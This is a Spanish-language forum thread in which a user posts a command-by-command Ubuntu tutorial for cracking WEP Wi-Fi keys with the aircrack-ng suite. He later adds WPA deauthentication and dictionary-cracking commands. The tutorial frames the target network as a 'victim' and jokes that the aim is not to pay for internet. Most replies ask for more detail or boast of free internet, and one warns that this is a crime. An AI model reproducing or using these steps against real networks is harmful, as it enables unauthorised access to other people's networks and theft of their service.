sacar claves de red con ubuntu de nuevo amigos aqui les dejo el tuto enterito

ekos_30

Bovino maduro
#1
[FONT=&quot]COMO CRAKEAR UNA RED WIFI UTILZANDO UBUNTU :eolo::eolo:[/FONT]
[FONT=&quot]Recuerda que tienes que deshabilitar tu red inalámbrica con click derecho muy importante
[/FONT]

[FONT=&quot]Todo esto háganlo como súper usuario[/FONT]
[FONT=&quot]Esto es con el comando sudo su[/FONT]
[FONT=&quot]Esto les pedirá su password[/FONT]
[FONT=&quot]
Lo primero es instalar la Suite aircrack-ng [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]# apt-get install aircrack-ng[/FONT]
[FONT=&quot]

Luego instalamos Macchanger [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]# apt-get install macchanger[/FONT]
[FONT=&quot]

Una vez instalado nos aseguramos de no estar conectados en ninguna red inalámbrica, dando click derecho en el icono de la red y desactivando la red inalámbrica, y abrimos una terminal:

- Activamos modo monitor en nuestra tarjeta de red (NO EN TODAS SE PUEDE, SI NO SE PUEDE ACTIVAR, NO PODRÁS CRACKEAR) [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]#airmon-ng start wlan0[/FONT]
[FONT=&quot]

- Vemos que nos sale que se activó en mon0, asi es que trabajaremos con mon0

-Damos de Baja mon0 [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]#ifconfig mon0 down[/FONT]
[FONT=&quot]


[/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot]-Cambiamos la dirección mac de mon0 por 00:11:22:33:44:55 [/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot]#macchanger -m 00:11:22:33:44:55 mon0[/FONT]
[FONT=&quot]

- Damos de alta mon0 [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]#ifconfig mon0 up[/FONT]
[FONT=&quot]

- Escaneamos las redes disponibles, y encontraremos nuestra victima [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]#airodump-ng mon0[/FONT]
[FONT=&quot]

- Detenemos la escaneada pulsando [/FONT]

[FONT=&quot]Apunta el nombre de la red tal como está he weii jejejeje[/FONT]
[FONT=&quot]Su dirección mac[/FONT]
[FONT=&quot]Y su canal [/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot]control – c[/FONT]
[FONT=&quot]

- Ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0[/FONT]
[FONT=&quot]


- Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red
- Cambiando los datos de los corchetes por los de nuestra victima


[/FONT]

[FONT=&quot]#aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0[/FONT]
[FONT=&quot]

- Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima.

[/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot] [/FONT]
[FONT=&quot]#aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [direction MAC] -h 00:11:22:33:44:55 mon0[/FONT]
[FONT=&quot]
- Le decimos que si (y) y le damos enter

- Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra víctima. [/FONT]

[FONT=&quot] [/FONT]
[FONT=&quot]#aircrack-ng -z [nombre red]*.cap[/FONT]

Y ESPERA EN UNOS CUANTOS MINUTOS TE DARA LA CLAVE CON UN FORMATO MASO MENOS ASI:

KEY FOUND ¡
89:44:56:67
SI TE DICE QUE NO HAY SUFICIENTES IVS ESPERA OTRO RATO Y VUELVE A INTERTAR LO ULTIMO


RECUERDA QUE ESTO SOLO SIRVE PARA WEP

ESPERO LES SIRVA
AHÍ ESTA PARA QUE NO PAGEN INTERNET JAJAJAJAJAJAJAJA:chavo::chavo:
 

efx__3d

Bovino de alcurnia
#8
no saben de una tarrjeta externa que tenga la opción de monitor, la de mi lap es sencilla, no trae eso :(
 

danieldrev

Bovino maduro
#9
la interfaz mon0 es el puerto con el que lo pondras para mandar paquetes, este no funciona hasta que das el comando ifconfig wlan0 start, de nuevo les digo, el hacking etico es solo para conocimiento no para que un monton de lammers que se creen hackers anden desprestigiando a las personas que realmente saben. Este tipo de info no es para que le tiren la red al vecino y esten de parasitos colgados a su linea, apuesto que el que hizo este tuto ni suyo es, y ni siquiera sabe que significa cada comando o si?. En fin, les quiero decir que eso ya es delito aqui tambien en mexico y encontrar a alguien ajeno a la red es muy facil a menos que sepan esconder sus huellas, si es que lo pueden hacer
 
#11
no manches hermano, ya hay como dos tutos de estos por acá neta si vas a aportar algo nuevo... te subieras mejor el de sacar WPA y WPA2, ahí sería novedoso, pero esto... revisa antes carnal.. no te dejo el link por hueva, pero tuxwar y asknet ya tienen tutos de estos y no le piden nada al tuyo. NEta bro WPA y WPA2... sino no tiene chiste..
 

ekos_30

Bovino maduro
#12
no manches hermano, ya hay como dos tutos de estos por acá neta si vas a aportar algo nuevo... te subieras mejor el de sacar WPA y WPA2, ahí sería novedoso, pero esto... revisa antes carnal.. no te dejo el link por hueva, pero tuxwar y asknet ya tienen tutos de estos y no le piden nada al tuyo. NEta bro WPA y WPA2... sino no tiene chiste..
ok les pondre pronto el de wpa y wpa2 y puse este tuto porq alugunos me lo pidieron de hecho es la tercera ves que lo subo no lo subo solo por subir y tampoko lo subo por molestar a alguien y si lo ise pido disculpas de antemano
 

ekos_30

Bovino maduro
#13
ok les pondre pronto el de wpa y wpa2 y puse este tuto porq alugunos me lo pidieron de hecho es la tercera ves que lo subo no lo subo solo por subir y tampoko lo subo por molestar a alguien y si lo ise pido disculpas de antemano
amm aqi dejo un video de como crakear las redes wpa y wpa2 usando windows vista amm no es linux pero igual sirve para este tipo de redes prometo buscar para usar en linux.
aqui esta el link del video:
http://www.youtube.com/watch?v=mJHryhtg1_U&feature=player_embedded#!
 

ekos_30

Bovino maduro
#14
amm aqi dejo un video de como crakear las redes wpa y wpa2 usando windows vista amm no es linux pero igual sirve para este tipo de redes prometo buscar para usar en linux.
aqui esta el link del video:
http://www.youtube.com/watch?v=mJHryhtg1_U&feature=player_embedded#!
Y por ultimo aqui esta el manual de redes de tipo wpa espero les sirva y comenten:
despues de haber hecho este paso:
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0

Para WPA aran lo siguiente:

sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0

Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima.

sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap

Por cierto recalco que estos tutoriales no son mios los encontre buscando en la red como lo dije la primera ves que lo subi espro les sriva saludos y comenten........:eolo::eolo::eolo::eolo::eolo::eolo:
 

ycxxi

Bovino Milenario
#15
Gracias por la informacion....me hubiera servido de mucho hace algunos mese ya que tuve que aprender todo desde el principio.
Otra cosa, no es por nada, pero deberias explicar paso por paso que significa cada comando y porque se ejecuta para que asi los bakunos entiendan como funciona y no nada mas esten escribiendo comandos sin idea de lo que son o que hacen exactamente.
Existen varios post donde solo se ponen los comandos sin explicaciones y los usuarios nuevos en realidad nunca los entienden.
De todas maneras se agradece...saludos a todos.
 

l2afa

Bovino Milenario
#16
Muchas gracias ekos es el mas sencillo que he visto..;)



En esa foto se lo hice a mi conexion inalambrica.. se llama LinuxW..



Ahh, si.. Yo lo hice desde Fedora 13,.. la instalación pues..

su --login (Para entrar como root)

yum -y install aircrack-ng macchanger

Y a seguir todos los pasos como en el tuto.. ;)
 

JesusPina

Bovino maduro
#17
Antes que nada te lo agradezco, de hecho por ahi tengo uno en video donde muestro paso a paso el procedimiento, y voy explicando los comandos que se utilizan.

Le faltan muchos detalles al tuto como el imprescindible comando kismet ya que este es el que nos brinda toda la información que necesitamaos, MAC del router, ESSID, número de clientes conectados, velocidad máxima de conexión, los vectores de inicialización, etc.
 
#19
naaa tu no hagas caso de los "super geeks", se agradece el aporte man, y si yo si soy jodido y siempre tengo internet gratis...si no para que jodidos me sirve el conocimiento?

Si vi los otros aportes, pero este me latio mas... me imagino a Shakespeare encabronandose por las mil versiones teatrales de hamlet
 
#20
amm aqi dejo un video de como crakear las redes wpa y wpa2 usando windows vista amm no es linux pero igual sirve para este tipo de redes prometo buscar para usar en linux.
aqui esta el link del video:
http://www.youtube.com/watch?v=mJHryhtg1_U&feature=player_embedded#![extraer texto de imagen ununtu 10/quote]

se agradece la intención, pero pues el de windows no va acá... hehe y luego te faltan un chingo de detalles.... nisiquiera pusiste los diccionarios para wpa, o que onda con el handshake... muy incompleto el de Wpa. tansiquiera pon un par de diccionarios.. mmm

si se supone que queremos un foro ordenado, no repitamos temas hermanos... y completemos los que ya están... te completara el de wpa y wpa2 pero tengo meses buscando diccionarios que me sirvan y no encuentro..

pero en fín.. lo bueno es que hay a quien le sirva tu tuto, que para eso está el bakita.. para ayudarnos.. espero no te lo tomes a mal pero pues es mi franca opinión, no sólo es aportar por aportar.
:metal:
 
Arriba